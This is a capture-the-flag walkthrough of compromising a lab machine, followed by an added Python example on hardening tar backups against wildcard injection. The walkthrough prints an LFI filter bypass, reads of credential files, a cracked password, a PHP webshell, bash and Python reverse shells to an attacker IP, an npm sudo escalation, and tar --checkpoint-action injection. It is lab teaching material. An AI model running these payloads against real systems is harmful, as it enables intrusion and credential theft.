Starting with the Nmap scan we can see two ports: a web server on port 80 and port 8080, which is reported as filtered.
The website looks fairly generic; you can navigate through its sections and pages.
In the first part we are supposed to enumerate the JavaScript files and look for any useful information. There are two such files:
/js/index_7ed54732.js
/js/index_d8338055.js
I always start with one of the most common approaches, which is to look for any links.
For this purpose I will use LinkFinder.
The script found two interesting links:
http://broadcast.shuriken.local
http://shuriken.local/index.php?referer=
The broadcast domain is protected with HTTP Basic authentication, which makes it unavailable to us for now.
In the second link, however, there is this referer query parameter, and it's vulnerable to a basic LFI. The filter checks whether the value contains "../" and removes it. Typing something like "..//" instead is enough to bypass it. It accepts GET requests.
I will use curl for this purpose (the URL is quoted so the shell does not touch the ? and / characters):
curl --url 'http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd'
The file content is also visible in the page source.
Since there is a domain locked behind HTTP Basic authentication, there most likely is an .htpasswd file somewhere on the system. It's actually in a very common location, /etc/apache2/.htpasswd.
It's always good practice to think about the file or information we are looking for. The website is hosted on the Apache2 web server. What is the Apache2 directory structure? What are the rules? To protect a page with Basic authentication, the full path to the .htpasswd file has to be given in the Apache configuration for that virtual host. That configuration is usually /etc/apache2/sites-enabled/000-default.conf and is readable by default, so reading it reveals the full location of the .htpasswd file.
Requesting that file gives the hashed credentials.
Supply them to john or hashcat:
john hash.txt --wordlist=/etc/wordlists/rockyou.txt
username: developers
password: 9972761drmfsls
Now we can log in to broadcast.shuriken.local.
It's a ClipBucket instance used to share videos. It's easy to notice that the version in use is 4.0, and there is a publicly available exploit for it:
https://www.exploit-db.com/exploits/44250
It's a text document that describes three different techniques to exploit it. Only the arbitrary file upload works, but that's enough to achieve RCE.
Prepare a PHP file with content like this:
<?php
system($_REQUEST['cmd']);
?>
Or pass reverse shell directly:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/8888 0>&1'");
?>
Upload the prepared file with the given exploit. Remember to authenticate with the correct credentials:
curl -F "file=@<file_name>" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/photo_uploader.php -u developers:9972761drmfsls
Now locate where the file is stored.
In my case it's http://broadcast.shuriken.local/files/photos/2020/10/05/ plus a randomly generated file name, which depends on the date and timestamp.
Now open the file and gain shell access. I uploaded the file with the cmd query argument for versatility.
Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This www-data account has special sudo privileges over the npm binary, the Node.js package manager: it can be run as the user server-management, which is the less privileged account used for system administration.
As you can recall, port 8080 is open. It's a Node.js staging application inside the server, so it would make sense that an account exists with elevated privileges over the npm binary.
To escalate privileges, prepare an npm package whose scripts section spawns a shell.
Initialize a new package with npm init; this creates a file named package.json.
Alter the scripts directive:
{
  "name": "tmp",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "shell": "/bin/bash"
  },
  "author": "",
  "license": "ISC"
}
Since nano doesn't work, the fastest way is to upload such a file from your own machine. It's possible to use curl for this.
Now install the package:
sudo -u server-management npm install
Finally, execute the script:
sudo -u server-management npm run-script shell
And this way the user is owned.
Now it's time for the root part.
Looking into the crontab reveals a job running every 2 minutes. It's a backup script.
It enters the /home/server-management/Documents directory and creates a backup of it with a wildcard (*) as the tar argument.
Such a construction is vulnerable to wildcard injection.
To exploit it, first create a shell file inside the /home/server-management/Documents directory containing a reverse shell:
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.33\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > shell.sh
Next, create a --checkpoint-action file pointing at that script:
echo "" > "--checkpoint-action=exec=sh shell.sh"
then create the matching checkpoint file:
echo "" > --checkpoint=1
When the cron job next runs, tar picks up these names as options and a connection to the Netcat listener comes back.
And that's root access.
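The wildcard injection works because the shell, not tar, expands *, so each filename in the directory becomes a separate command-line argument and any name starting with a dash is parsed as an option. The following Python example is added here and is not part of the write-up or the box; it reconstructs that expansion for the three filenames the write-up places in Documents (used as constructed test data), lists which of them tar would treat as options, and shows two backup forms that cannot be hijacked this way: a tar invocation that ends option parsing with -- and prefixes every operand with ./, and Python's tarfile module, which receives names as data rather than as command-line tokens. The use of sorted() to stand in for the shell's glob collation order is an assumption.

```python
"""Why `tar czf backup.tar.gz *` is exploitable, and two ways to back up a
directory that do not let filenames turn into tar options.

Added example; not part of the original write-up. The filenames below are
the ones the write-up drops into the Documents directory, used here as
constructed test data.
"""
import os
import tarfile
import tempfile

# Constructed directory listing: one harmless file plus two names that only
# look like tar options. On disk they are ordinary (empty) files.
SAMPLE_NAMES = [
    "shell.sh",
    "--checkpoint=1",
    "--checkpoint-action=exec=sh shell.sh",
]


def glob_expanded_argv(names, archive="backup.tar.gz"):
    """What the shell hands to tar for `tar czf ARCHIVE *`.

    The shell expands `*` before tar starts, so every filename becomes its own
    argument and tar parses anything beginning with '-' as an option.
    (Assumption: sorted() stands in for the shell's collation order.)
    """
    return ["tar", "czf", archive] + sorted(names)


def option_like_names(names):
    """Filenames that tar would accept as options rather than as files."""
    return [n for n in names if n.startswith("-")]


def safe_tar_argv(directory, names, archive="backup.tar.gz"):
    """A tar invocation that filenames cannot hijack.

    `--` ends option parsing, the `./` prefix guarantees no operand starts
    with '-', and `-C` keeps archive paths relative to the directory.
    """
    return ["tar", "-czf", archive, "-C", directory, "--"] + [
        "./" + n for n in sorted(names)
    ]


def backup_with_tarfile(directory, archive):
    """Archive every entry of `directory` with Python's tarfile module.

    Names are passed as data, never as command-line tokens, so there is no
    option parsing to abuse. Returns the sorted member names in the archive.
    """
    with tarfile.open(archive, "w:gz") as tar:
        for entry in sorted(os.scandir(directory), key=lambda e: e.name):
            tar.add(entry.path, arcname=entry.name, recursive=False)
    with tarfile.open(archive, "r:gz") as tar:
        return sorted(tar.getnames())


def demo_backup():
    """Create the constructed files in a temporary directory, back them up
    with tarfile, and return the member names that ended up in the archive."""
    with tempfile.TemporaryDirectory() as work:
        docs = os.path.join(work, "Documents")
        os.mkdir(docs)
        for name in SAMPLE_NAMES:
            with open(os.path.join(docs, name), "w") as fh:
                fh.write("")
        return backup_with_tarfile(docs, os.path.join(work, "backup.tar.gz"))


if __name__ == "__main__":
    print("argv the cron job really runs:", glob_expanded_argv(SAMPLE_NAMES))
    print("names parsed as options:      ", option_like_names(SAMPLE_NAMES))
    print("hardened argv:                ",
          safe_tar_argv("/home/server-management/Documents", SAMPLE_NAMES))
    print("tarfile members:              ", demo_backup())
```

The same observation is what a reviewer looks for in any cron job or backup script: a bare glob passed to a command that accepts options is a finding, and the fix is either the -- separator with ./-prefixed operands or archiving the directory itself (tar -C DIR .) so no filename ever reaches the option parser.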